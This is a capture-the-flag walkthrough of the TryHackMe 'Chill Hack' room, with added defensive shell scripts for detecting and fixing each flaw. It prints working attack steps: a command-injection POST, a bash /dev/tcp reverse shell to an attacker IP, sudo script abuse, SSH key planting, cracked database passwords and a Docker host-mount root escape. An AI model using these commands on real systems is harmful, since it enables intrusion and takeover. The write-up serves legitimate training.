Chill Hack — Tryhackme.com

Penthos
6 min read · Jul 29, 2021


Room link: https://tryhackme.com/room/chillhack

A quick enumeration to get started. As a minimum I usually run nmap, nikto and gobuster.

Nmap

PORT   STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Gobuster

/css
/images
/fonts
/secret # Seems interesting!
/js

http://10.10.44.162/secret/

*replace the IP with your room's IP

This page gives us a box with command execution (Easy!)

Trying other things like “ls” gives you…

Testing some more, I quickly realise we can chain commands together using “;”, i.e.:

id;ls

I captured the request in Burp Suite and then tried a few payloads to get a reverse shell back. First I used a simple ping command to prove the connection back to me.

Kali

sudo tcpdump -i tun0 icmp

Post request

POST /secret/ HTTP/1.1
Host: 10.10.44.162
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://10.10.44.162
Connection: close
Referer: http://10.10.44.162/secret/
Upgrade-Insecure-Requests: 1
command=id%3bping%20-c%201%2010.8.153.120

Bingo! A reply!

┌──(ac1d㉿kali)-[~]
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for ac1d:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:35:26.127709 IP 10.10.44.162 > 10.8.153.120: ICMP echo request, id 1871, seq 1, length 64
23:35:26.127742 IP 10.8.153.120 > 10.10.44.162: ICMP echo reply, id 1871, seq 1, length 64

Now I test payloads to see what pings back.
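The same capture also works the other way round, as a detection. A web server has no reason to send ICMP echo requests to arbitrary hosts, so a single outbound ping from it is a strong sign of exactly the blind injection probe shown above. The shell functions below are an added example, not code from the writeup: they read tcpdump's default text output (the format printed above) on stdin and report every echo request originated by a watched server. The watched-server list, the function names and the sample lines in the usage are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not from the writeup: turn the tcpdump output above into a check.
# A web server has no business sending ICMP echo requests to arbitrary hosts, so an
# outbound "ping -c 1" from it is a strong sign of a blind command-injection probe.

# Usage: flag_outbound_icmp "<server ip> [<server ip> ...]" < tcpdump.txt
# Reads tcpdump's default text lines (as shown above) on stdin and prints
# "<timestamp> <server> -> <destination>" for each echo request a watched
# server originated. Echo replies and requests from other hosts are ignored.
flag_outbound_icmp() {
    awk -v servers="$1" '
        BEGIN { n = split(servers, s, " "); for (i = 1; i <= n; i++) watch[s[i]] = 1 }
        /ICMP echo request/ {
            # Line shape: "HH:MM:SS.usec IP <src> > <dst>: ICMP echo request, ..."
            src = $3
            dst = $5; sub(/:$/, "", dst)
            if (src in watch) print $1, src, "->", dst
        }'
}

# Count echo requests per watched server, for a simple threshold rule.
# Prints "<server> <count>", one line per server that sent at least one request.
count_outbound_icmp() {
    flag_outbound_icmp "$1" | awk '{ c[$2]++ } END { for (h in c) print h, c[h] }'
}

# Example run on constructed input (the two lines from the capture above plus one
# request that did not come from the server):
#   printf '%s\n' "$sample" | flag_outbound_icmp "10.10.44.162"
# would print:
#   23:35:26.127709 10.10.44.162 -> 10.8.153.120
```

Fed live from `tcpdump -l -n icmp` on a sensor that sees the server's traffic, the first function gives an alert line per probe and the second a count to alert on; note the `-n` so addresses stay numeric for the awk fields.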

Reverse shell

Sending a bash reverse shell payload through the command injection we just found gives us a shell back.

command=id%3bbash%20-c%20%22%2fbin%2fbash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.8.153.120%2f9999%200%3e%261%

Decoded

command=id;bash -c "/bin/bash -i >& /dev/tcp/10.8.153.120/9999 0>&1"

User

Checking sudo -l as www-data shows us something interesting.

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/tmp$ cat /home/apaar/.helpline.sh
#!/bin/bash
echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person, Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"

We can run a script as the user apaar.
The script reads a name into the person variable.
Then it asks for a msg and runs it as a command with 2>/dev/null (2 = STDERR): errors are sent nowhere, but the command still executes.
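For comparison, here is how the same helpline could be written so that the message is data rather than a command. This is an added example, not the room's script: the `helpline_record` function, the `HELPLINE_LOG` path and the name validation rule are assumptions made for this example. The key change is that `$msg` is only ever passed to `printf '%s'` as a quoted argument, so there is nothing left for `2>/dev/null` to hide.

```shell
#!/bin/sh
# Added example, not the room's script: a helpline that records the message
# instead of executing it. The original's fatal line is `$msg 2>/dev/null`, which
# hands whatever the caller typed to the shell as a command (run as apaar via sudo).

# Accept only a plain identifier as the name: letters, digits, '.', '_' and '-', up to 64 chars.
valid_name() {
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
    esac
    [ "${#1}" -le 64 ]
}

# Store one message. Arguments: person, message. Appends a line to the log
# (path taken from $HELPLINE_LOG, an assumption for this example) and prints the
# same closing line as the original. Returns 1 on an invalid name.
helpline_record() {
    person="$1"
    msg="$2"
    log="${HELPLINE_LOG:-/tmp/helpline.log}"
    if ! valid_name "$person"; then
        printf 'Invalid name\n' >&2
        return 1
    fi
    # %s with a quoted argument: no word splitting, no globbing, no command
    # substitution. A message such as "id; /bin/bash" lands in the log as literal text.
    printf '%s|%s|%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$person" "$msg" >> "$log"
    printf 'Thank you for your precious time!\n'
}

# Interactive front end with the original prompts; read -r keeps backslashes literal.
helpline_main() {
    printf '\nWelcome to helpdesk. Feel free to talk to anyone at any time!\n\n'
    printf 'Enter the person whom you want to talk with: '
    read -r person
    printf 'Hello user! I am %s, Please enter your message: ' "$person"
    read -r msg
    helpline_record "$person" "$msg"
}
```

Even with this rewrite the sudoers entry deserves a second look: a rule should grant the narrowest command that does the job, and a script living under the target user's own home directory is writable by that user, so its contents can change after the rule was reviewed.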

I send another ping to myself to prove it's working.

Then I try simply /bin/bash for a shell as the user.

sudo -u apaar /home/apaar/.helpline.sh

Now we upgrade to a proper TTY. This is still not a great terminal, so read on for a better one.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Get ssh access

Seeing that the .ssh/ folder is writable, I can add my SSH public key and just log in.

Kali box

ssh-keygen

Accept all defaults and then cat the id_rsa.pub key out.

cat ~/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQq4KtSkrifBP5HFkQ+/zrsalHvnsNI1TvefMU92X06G6XN9E2fYajOuLq/0yV1Ak57ohnNQFXSFHQBV9tB0rTFDmhaHCaGuqX+ZSMvSwHwZW32OasxAMnJPbTzSCqli58JN+GdVd81PJPNHnva1Q2WZ/cnvfc<REDACTED>0yFWnTkjx4tAZV+DG27IiOTlJSe2rUFR/eRDI7kN3d2qDiqChI/7F+ld+lqZLEHOhagYSamwGGu0t+0H39COfLX5PfhMBMKKpaaR6FR8AdYvIw6yyoNjNfnnXU2977Cn7m/Zz/l7xy+KYXRng+JBtjDbyg4jXGc= ac1d@kali

Then add it to the authorized_keys file in that .ssh/ folder.

cat <<EOF > authorized_keys
#paste the key here
EOF

Now connect over SSH.

ssh apaar@10.10.44.162 -i ~/.ssh/id_rsa

A much better terminal

We can now get the user flag in /home/apaar/local.txt

Enum Round 2

Checking the rest of the system, I found the MySQL username and password in the login index page.

Using the details we can log in and check the databases out.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| webportal          |
+--------------------+
5 rows in set (0.00 sec)

mysql> use webportal;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------+
| Tables_in_webportal |
+---------------------+
| users               |
+---------------------+
1 row in set (0.00 sec)

mysql> select * from users;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username  | password                         |
+----+-----------+----------+-----------+----------------------------------+
|  1 | Anurodh   | Acharya  | Aurick    | 7e53614ced3640d5de23f111806cc4fd |
|  2 | Apaar     | Dahal    | cullapaar | 686216240e5af30df0501e53c789a649 |
+----+-----------+----------+-----------+----------------------------------+

Let's see if we can crack the passwords.

anurodh:masterpassword
apaar:dontaskdonttell

Running linpeas again as apaar didn’t show much new at all. I spent hours looking and finding not much at all. I saw a port running on 127.0.0.1:9001 I hadn’t checked out yet, so started there.

This seemed to host an Apache server on port 9001, which is owned by the root user.

I started to check the images with stego techniques.

steghide info hacker-with-laptop_23-2147985341.jpg 
"hacker-with-laptop_23-2147985341.jpg":
format: jpeg
capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "backup.zip":
size: 750.0 Byte
encrypted: rijndael-128, cbc
compressed: yes

steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".

Time to crack the .zip file. We can do this in a few ways.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt hacker-with-laptop_23-2147985341.jpg backup.zip
found id e0ffd8ff, 'hacker-with-laptop_23-2147985341.jpg' is not a zipfile ver 2.xx, skipping
PASSWORD FOUND!!!!: pw == pass1word

unzip backup.zip
Archive:  backup.zip
[backup.zip] source_code.php password:
  inflating: source_code.php

We can get a base64-encoded password from the extracted file.

Using that password for anurodh we can swap user accounts.
Running linpeas again as anurodh shows we can use docker and it's writable! (escape time)

Root

Listing the images shows us some containers ready to roll.

I know I've used the Alpine image trick to escape Docker before.
We can run docker, mount the host's / into the container, chroot into it with bash and throw the container away afterwards (--rm). Then grab the last flag!

docker run -v /:/mnt --rm -it alpine chroot /mnt bash
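From the defending side, the mount above is the reason docker group membership and write access to the Docker socket are treated as root-equivalent. The script below is an added example, not code from the writeup or from HackTricks: it audits both conditions, listing docker group members from /etc/group-style content and checking whether a socket path is group- or world-writable. The function names, the constructed group-file sample and the reliance on GNU `stat -c %a` are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the writeup): audit who could repeat the escape above.
# Anyone in the docker group, or anyone who can write to the Docker socket, can
# bind-mount the host root (-v /:/mnt) and chroot into it, so both are root-equivalent.

# Print the members of the docker group, one per line. Reads /etc/group-formatted
# content on stdin (name:password:gid:member1,member2,...).
docker_group_members() {
    awk -F: '$1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }'
}

# Return 0 if the path is writable by its group or by others, 1 if not, 2 if it
# cannot be stat'ed. Uses GNU stat -c %a (assumption: coreutils is present).
group_or_world_writable() {
    mode=$(stat -c %a "$1" 2>/dev/null) || return 2
    # %a prints the octal mode as text, e.g. 660. Take the digits as characters
    # so a leading 0 or a setuid/setgid digit cannot confuse shell arithmetic.
    o=${mode#"${mode%?}"}      # last digit: others
    rest=${mode%?}
    g=${rest#"${rest%?}"}      # second to last digit: group
    [ $(( g & 2 )) -ne 0 ] || [ $(( o & 2 )) -ne 0 ]
}

# Report both exposures for a group file and a socket path. Prints one line per
# finding and returns 0 if nothing was found, 1 otherwise.
docker_escape_exposure() {
    group_file="$1"
    sock="$2"
    found=0
    for u in $(docker_group_members < "$group_file"); do
        printf 'docker group member (root-equivalent): %s\n' "$u"
        found=1
    done
    if group_or_world_writable "$sock"; then
        printf 'docker socket writable by group/others: %s\n' "$sock"
        found=1
    fi
    return "$found"
}

# Constructed sample for a dry run (not a real host's /etc/group):
#   printf 'root:x:0:\ndocker:x:999:anurodh,apaar\n' | docker_group_members
# prints "anurodh" and "apaar".
```

On a live host, `docker_escape_exposure /etc/group /var/run/docker.sock` gives the list to review: every member who is not an administrator is a finding, as is a socket writable beyond its owner and group. For detection of the escape itself, a `docker run` carrying a bind mount of the host root, as in the command above, is worth alerting on wherever container commands are logged.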

Credits: https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

Thanks for reading :)
